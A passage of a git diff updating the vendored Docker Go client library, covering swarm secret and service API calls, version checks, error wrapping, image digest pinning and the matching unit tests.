"/v1.25/secrets/secret_id" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if 
!strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go index 7e9d5ec167..f6bf7ba470 100644 --- a/vendor/github.com/docker/docker/client/secret_list.go +++ b/vendor/github.com/docker/docker/client/secret_list.go @@ -1,21 +1,24 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretList returns the list of secrets. func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) { + if err := cli.NewVersionError("1.25", "secret list"); err != nil { + return nil, err + } query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go index 1ac11cddb3..72323b055f 100644 --- a/vendor/github.com/docker/docker/client/secret_list_test.go +++ b/vendor/github.com/docker/docker/client/secret_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,12 +13,23 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretListUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, err := 
client.SecretList(context.Background(), types.SecretListOptions{}) + assert.Check(t, is.Error(err, `"secret list" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretListError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.SecretList(context.Background(), types.SecretListOptions{}) @@ -27,7 +39,7 @@ func TestSecretListError(t *testing.T) { } func TestSecretList(t *testing.T) { - expectedURL := "/secrets" + expectedURL := "/v1.25/secrets" filters := filters.NewArgs() filters.Add("label", "label1") @@ -54,6 +66,7 @@ func TestSecretList(t *testing.T) { } for _, listCase := range listCases { client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go index 1955b988a9..e9d5218293 100644 --- a/vendor/github.com/docker/docker/client/secret_remove.go +++ b/vendor/github.com/docker/docker/client/secret_remove.go @@ -1,10 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // SecretRemove removes a Secret. 
func (cli *Client) SecretRemove(ctx context.Context, id string) error { + if err := cli.NewVersionError("1.25", "secret remove"); err != nil { + return err + } resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "secret", id) } diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go index f269f787d2..bdfccf6be8 100644 --- a/vendor/github.com/docker/docker/client/secret_remove_test.go +++ b/vendor/github.com/docker/docker/client/secret_remove_test.go @@ -1,19 +1,31 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretRemoveUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + err := client.SecretRemove(context.Background(), "secret_id") + assert.Check(t, is.Error(err, `"secret remove" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretRemoveError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.SecretRemove(context.Background(), "secret_id") @@ -23,9 +35,10 @@ func TestSecretRemoveError(t *testing.T) { } func TestSecretRemove(t *testing.T) { - expectedURL := "/secrets/secret_id" + expectedURL := "/v1.25/secrets/secret_id" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_update.go 
b/vendor/github.com/docker/docker/client/secret_update.go index b94e24aab0..164256bbc1 100644 --- a/vendor/github.com/docker/docker/client/secret_update.go +++ b/vendor/github.com/docker/docker/client/secret_update.go @@ -1,16 +1,18 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SecretUpdate updates a Secret. Currently, the only part of a secret spec -// which can be updated is Labels. +// SecretUpdate attempts to update a Secret func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error { + if err := cli.NewVersionError("1.25", "secret update"); err != nil { + return err + } query := url.Values{} query.Set("version", strconv.FormatUint(version.Index, 10)) resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil) diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go index c620985bd5..c7670b440c 100644 --- a/vendor/github.com/docker/docker/client/secret_update_test.go +++ b/vendor/github.com/docker/docker/client/secret_update_test.go @@ -1,21 +1,32 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretUpdateUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + assert.Check(t, is.Error(err, `"secret update" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretUpdateError(t *testing.T) { client := &Client{ - client: 
newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) @@ -25,9 +36,10 @@ func TestSecretUpdateError(t *testing.T) { } func TestSecretUpdate(t *testing.T) { - expectedURL := "/secrets/secret_id/update" + expectedURL := "/v1.25/secrets/secret_id/update" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go index 3d1be225bd..8fadda4a90 100644 --- a/vendor/github.com/docker/docker/client/service_create.go +++ b/vendor/github.com/docker/docker/client/service_create.go @@ -1,23 +1,75 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" + "fmt" + "strings" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) // ServiceCreate creates a new Service. 
func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) { - var headers map[string][]string + var distErr error + + headers := map[string][]string{ + "version": {cli.version}, + } if options.EncodedRegistryAuth != "" { - headers = map[string][]string{ - "X-Registry-Auth": {options.EncodedRegistryAuth}, + headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth} + } + + // Make sure containerSpec is not nil when no runtime is set or the runtime is set to container + if service.TaskTemplate.ContainerSpec == nil && (service.TaskTemplate.Runtime == "" || service.TaskTemplate.Runtime == swarm.RuntimeContainer) { + service.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } + + if err := validateServiceSpec(service); err != nil { + return types.ServiceCreateResponse{}, err + } + + // ensure that the image is tagged + var imgPlatforms []swarm.Platform + if service.TaskTemplate.ContainerSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" { + service.TaskTemplate.ContainerSpec.Image = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.ContainerSpec.Image = img + } } } + // ensure that the image is tagged + if service.TaskTemplate.PluginSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" { + service.TaskTemplate.PluginSpec.Remote = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.PluginSpec.Remote = img + } + } + } + + if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 { + 
service.TaskTemplate.Placement = &swarm.Placement{} + } + if len(imgPlatforms) > 0 { + service.TaskTemplate.Placement.Platforms = imgPlatforms + } + var response types.ServiceCreateResponse resp, err := cli.post(ctx, "/services/create", nil, service, headers) if err != nil { @@ -25,6 +77,90 @@ func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, } err = json.NewDecoder(resp.body).Decode(&response) + + if distErr != nil { + response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image)) + } + ensureReaderClosed(resp) return response, err } + +func imageDigestAndPlatforms(ctx context.Context, cli DistributionAPIClient, image, encodedAuth string) (string, []swarm.Platform, error) { + distributionInspect, err := cli.DistributionInspect(ctx, image, encodedAuth) + var platforms []swarm.Platform + if err != nil { + return "", nil, err + } + + imageWithDigest := imageWithDigestString(image, distributionInspect.Descriptor.Digest) + + if len(distributionInspect.Platforms) > 0 { + platforms = make([]swarm.Platform, 0, len(distributionInspect.Platforms)) + for _, p := range distributionInspect.Platforms { + // clear architecture field for arm. This is a temporary patch to address + // https://github.com/docker/swarmkit/issues/2294. The issue is that while + // image manifests report "arm" as the architecture, the node reports + // something like "armv7l" (includes the variant), which causes arm images + // to stop working with swarm mode. This patch removes the architecture + // constraint for arm images to ensure tasks get scheduled. + arch := p.Architecture + if strings.ToLower(arch) == "arm" { + arch = "" + } + platforms = append(platforms, swarm.Platform{ + Architecture: arch, + OS: p.OS, + }) + } + } + return imageWithDigest, platforms, err +} + +// imageWithDigestString takes an image string and a digest, and updates +// the image string if it didn't originally contain a digest. 
It returns +// an empty string if there are no updates. +func imageWithDigestString(image string, dgst digest.Digest) string { + namedRef, err := reference.ParseNormalizedNamed(image) + if err == nil { + if _, isCanonical := namedRef.(reference.Canonical); !isCanonical { + // ensure that image gets a default tag if none is provided + img, err := reference.WithDigest(namedRef, dgst) + if err == nil { + return reference.FamiliarString(img) + } + } + } + return "" +} + +// imageWithTagString takes an image string, and returns a tagged image +// string, adding a 'latest' tag if one was not provided. It returns an +// empty string if a canonical reference was provided +func imageWithTagString(image string) string { + namedRef, err := reference.ParseNormalizedNamed(image) + if err == nil { + return reference.FamiliarString(reference.TagNameOnly(namedRef)) + } + return "" +} + +// digestWarning constructs a formatted warning string using the +// image name that could not be pinned by digest. The formatting +// is hardcoded, but could me made smarter in the future +func digestWarning(image string) string { + return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. 
Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image) +} + +func validateServiceSpec(s swarm.ServiceSpec) error { + if s.TaskTemplate.ContainerSpec != nil && s.TaskTemplate.PluginSpec != nil { + return errors.New("must not specify both a container spec and a plugin spec in the task template") + } + if s.TaskTemplate.PluginSpec != nil && s.TaskTemplate.Runtime != swarm.RuntimePlugin { + return errors.New("mismatched runtime with plugin spec") + } + if s.TaskTemplate.ContainerSpec != nil && (s.TaskTemplate.Runtime != "" && s.TaskTemplate.Runtime != swarm.RuntimeContainer) { + return errors.New("mismatched runtime with container spec") + } + return nil +} diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go index 1e07382870..9f51c18223 100644 --- a/vendor/github.com/docker/docker/client/service_create_test.go +++ b/vendor/github.com/docker/docker/client/service_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,8 +11,12 @@ import ( "testing" "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/image-spec/specs-go/v1" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceCreateError(t *testing.T) { @@ -55,3 +60,152 @@ func TestServiceCreate(t *testing.T) { t.Fatalf("expected `service_id`, got %s", r.ID) } } + +func TestServiceCreateCompatiblePlatforms(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") { + var serviceSpec swarm.ServiceSpec 
+ + // check if the /distribution endpoint returned correct output + err := json.NewDecoder(req.Body).Decode(&serviceSpec) + if err != nil { + return nil, err + } + + assert.Check(t, is.Equal("foobar:1.0@sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96", serviceSpec.TaskTemplate.ContainerSpec.Image)) + assert.Check(t, is.Len(serviceSpec.TaskTemplate.Placement.Platforms, 1)) + + p := serviceSpec.TaskTemplate.Placement.Platforms[0] + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_" + p.OS + "_" + p.Architecture, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") { + b, err := json.Marshal(registrytypes.DistributionInspect{ + Descriptor: v1.Descriptor{ + Digest: "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96", + }, + Platforms: []v1.Platform{ + { + Architecture: "amd64", + OS: "linux", + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else { + return nil, fmt.Errorf("unexpected URL '%s'", req.URL.Path) + } + }), + } + + spec := swarm.ServiceSpec{TaskTemplate: swarm.TaskSpec{ContainerSpec: &swarm.ContainerSpec{Image: "foobar:1.0"}}} + + r, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{QueryRegistry: true}) + assert.Check(t, err) + assert.Check(t, is.Equal("service_linux_amd64", r.ID)) +} + +func TestServiceCreateDigestPinning(t *testing.T) { + dgst := "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96" + dgstAlt := "sha256:37ffbf3f7497c07584dc9637ffbf3f7497c0758c0537ffbf3f7497c0c88e2bb7" + serviceCreateImage := "" + pinByDigestTests := []struct { + img string // input image provided by the user + expected string // expected image after digest pinning + }{ + // 
default registry returns familiar string + {"docker.io/library/alpine", "alpine:latest@" + dgst}, + // provided tag is preserved and digest added + {"alpine:edge", "alpine:edge@" + dgst}, + // image with provided alternative digest remains unchanged + {"alpine@" + dgstAlt, "alpine@" + dgstAlt}, + // image with provided tag and alternative digest remains unchanged + {"alpine:edge@" + dgstAlt, "alpine:edge@" + dgstAlt}, + // image on alternative registry does not result in familiar string + {"alternate.registry/library/alpine", "alternate.registry/library/alpine:latest@" + dgst}, + // unresolvable image does not get a digest + {"cannotresolve", "cannotresolve:latest"}, + } + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") { + // reset and set image received by the service create endpoint + serviceCreateImage = "" + var service swarm.ServiceSpec + if err := json.NewDecoder(req.Body).Decode(&service); err != nil { + return nil, fmt.Errorf("could not parse service create request") + } + serviceCreateImage = service.TaskTemplate.ContainerSpec.Image + + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/cannotresolve") { + // unresolvable image + return nil, fmt.Errorf("cannot resolve image") + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") { + // resolvable images + b, err := json.Marshal(registrytypes.DistributionInspect{ + Descriptor: v1.Descriptor{ + Digest: digest.Digest(dgst), + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } + return nil, fmt.Errorf("unexpected URL '%s'", 
req.URL.Path) + }), + } + + // run pin by digest tests + for _, p := range pinByDigestTests { + r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: &swarm.ContainerSpec{ + Image: p.img, + }, + }, + }, types.ServiceCreateOptions{QueryRegistry: true}) + + if err != nil { + t.Fatal(err) + } + + if r.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", r.ID) + } + + if p.expected != serviceCreateImage { + t.Fatalf("expected image %s, got %s", p.expected, serviceCreateImage) + } + } +} diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go index ca71cbde1a..de6aa22de7 100644 --- a/vendor/github.com/docker/docker/client/service_inspect.go +++ b/vendor/github.com/docker/docker/client/service_inspect.go @@ -1,23 +1,27 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" + "fmt" "io/ioutil" - "net/http" + "net/url" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceInspectWithRaw returns the service information and the raw data. 
-func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) { - serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil) +func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string, opts types.ServiceInspectOptions) (swarm.Service, []byte, error) { + if serviceID == "" { + return swarm.Service{}, nil, objectNotFoundError{object: "service", id: serviceID} + } + query := url.Values{} + query.Set("insertDefaults", fmt.Sprintf("%v", opts.InsertDefaults)) + serverResp, err := cli.get(ctx, "/services/"+serviceID, query, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Service{}, nil, serviceNotFoundError{serviceID} - } - return swarm.Service{}, nil, err + return swarm.Service{}, nil, wrapResponseError(err, serverResp, "service", serviceID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go index e235cf0fef..b69332ccc6 100644 --- a/vendor/github.com/docker/docker/client/service_inspect_test.go +++ b/vendor/github.com/docker/docker/client/service_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,9 @@ import ( "strings" "testing" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestServiceInspectError(t *testing.T) { @@ -18,7 +20,7 @@ func TestServiceInspectError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing") + _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing", types.ServiceInspectOptions{}) if err == nil || err.Error() != "Error response from daemon: 
Server error" { t.Fatalf("expected a Server Error, got %v", err) } @@ -29,9 +31,21 @@ func TestServiceInspectServiceNotFound(t *testing.T) { client: newMockClient(errorMock(http.StatusNotFound, "Server error")), } - _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrServiceNotFound(err) { - t.Fatalf("expected an serviceNotFoundError error, got %v", err) + _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown", types.ServiceInspectOptions{}) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a serviceNotFoundError error, got %v", err) + } +} + +func TestServiceInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ServiceInspectWithRaw(context.Background(), "", types.ServiceInspectOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } @@ -55,7 +69,7 @@ func TestServiceInspect(t *testing.T) { }), } - serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id") + serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id", types.ServiceInspectOptions{}) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go index c29e6d407d..7d53e2b9b9 100644 --- a/vendor/github.com/docker/docker/client/service_list.go +++ b/vendor/github.com/docker/docker/client/service_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceList returns the list of services. 
@@ -15,7 +15,7 @@ func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOpt query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go index 213981ef70..9903f9e71c 100644 --- a/vendor/github.com/docker/docker/client/service_list_test.go +++ b/vendor/github.com/docker/docker/client/service_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestServiceListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go index 24384e3ec0..906fd4059e 100644 --- a/vendor/github.com/docker/docker/client/service_logs.go +++ b/vendor/github.com/docker/docker/client/service_logs.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" timetypes "github.com/docker/docker/api/types/time" + "github.com/pkg/errors" ) // ServiceLogs returns the logs generated by a service in an io.ReadCloser. 
@@ -26,7 +26,7 @@ func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options ty if options.Since != "" { ts, err := timetypes.GetTimestamp(options.Since, time.Now()) if err != nil { - return nil, err + return nil, errors.Wrap(err, `invalid value for "since"`) } query.Set("since", ts) } diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go index a6d002ba75..28f3ab5c6b 100644 --- a/vendor/github.com/docker/docker/client/service_logs_test.go +++ b/vendor/github.com/docker/docker/client/service_logs_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io" "io/ioutil" @@ -13,8 +14,8 @@ import ( "time" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceLogsError(t *testing.T) { @@ -22,15 +23,11 @@ func TestServiceLogsError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) _, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{ Since: "2006-01-02TZ", }) - if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { - t.Fatalf("expected a 'parsing time' error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) } func TestServiceLogs(t *testing.T) { @@ -38,6 +35,7 @@ func TestServiceLogs(t *testing.T) { cases := []struct { options types.ContainerLogsOptions expectedQueryParams map[string]string + expectedError string }{ { expectedQueryParams: map[string]string{ @@ 
-71,21 +69,27 @@ func TestServiceLogs(t *testing.T) { }, { options: types.ContainerLogsOptions{ - // An complete invalid date, timestamp or go duration will be - // passed as is - Since: "invalid but valid", + // timestamp will be passed as is + Since: "1136073600.000000001", }, expectedQueryParams: map[string]string{ "tail": "", - "since": "invalid but valid", + "since": "1136073600.000000001", }, }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Since: "invalid value", + }, + expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`, + }, } for _, logCase := range cases { client := &Client{ client: newMockClient(func(r *http.Request) (*http.Response, error) { if !strings.HasPrefix(r.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL) } // Check query parameters query := r.URL.Query() @@ -102,17 +106,15 @@ func TestServiceLogs(t *testing.T) { }), } body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options) - if err != nil { - t.Fatal(err) + if logCase.expectedError != "" { + assert.Check(t, is.Error(err, logCase.expectedError)) + continue } + assert.NilError(t, err) defer body.Close() content, err := ioutil.ReadAll(body) - if err != nil { - t.Fatal(err) - } - if string(content) != "response" { - t.Fatalf("expected response to contain 'response', got %s", string(content)) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "response")) } } diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go index a9331f92c2..fe3421bec8 100644 --- a/vendor/github.com/docker/docker/client/service_remove.go +++ b/vendor/github.com/docker/docker/client/service_remove.go @@ -1,10 +1,10 @@ -package client +package client // import 
"github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ServiceRemove kills and removes a service. func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error { resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "service", serviceID) } diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go index 8e2ac259c1..d2379a1366 100644 --- a/vendor/github.com/docker/docker/client/service_remove_test.go +++ b/vendor/github.com/docker/docker/client/service_remove_test.go @@ -1,14 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceRemoveError(t *testing.T) { @@ -17,9 +19,17 @@ func TestServiceRemoveError(t *testing.T) { } err := client.ServiceRemove(context.Background(), "service_id") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestServiceRemoveNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + + err := client.ServiceRemove(context.Background(), "service_id") + assert.Check(t, is.Error(err, "Error: No such service: service_id")) + assert.Check(t, IsErrNotFound(err)) } func TestServiceRemove(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go index afa94d47e2..5a7a61b01f 100644 --- a/vendor/github.com/docker/docker/client/service_update.go +++ b/vendor/github.com/docker/docker/client/service_update.go @@ -1,34 +1,80 
@@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strconv" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceUpdate updates a Service. func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) { var ( - headers map[string][]string query = url.Values{} + distErr error ) + headers := map[string][]string{ + "version": {cli.version}, + } + if options.EncodedRegistryAuth != "" { - headers = map[string][]string{ - "X-Registry-Auth": {options.EncodedRegistryAuth}, - } + headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth} } if options.RegistryAuthFrom != "" { query.Set("registryAuthFrom", options.RegistryAuthFrom) } + if options.Rollback != "" { + query.Set("rollback", options.Rollback) + } + query.Set("version", strconv.FormatUint(version.Index, 10)) + if err := validateServiceSpec(service); err != nil { + return types.ServiceUpdateResponse{}, err + } + + var imgPlatforms []swarm.Platform + // ensure that the image is tagged + if 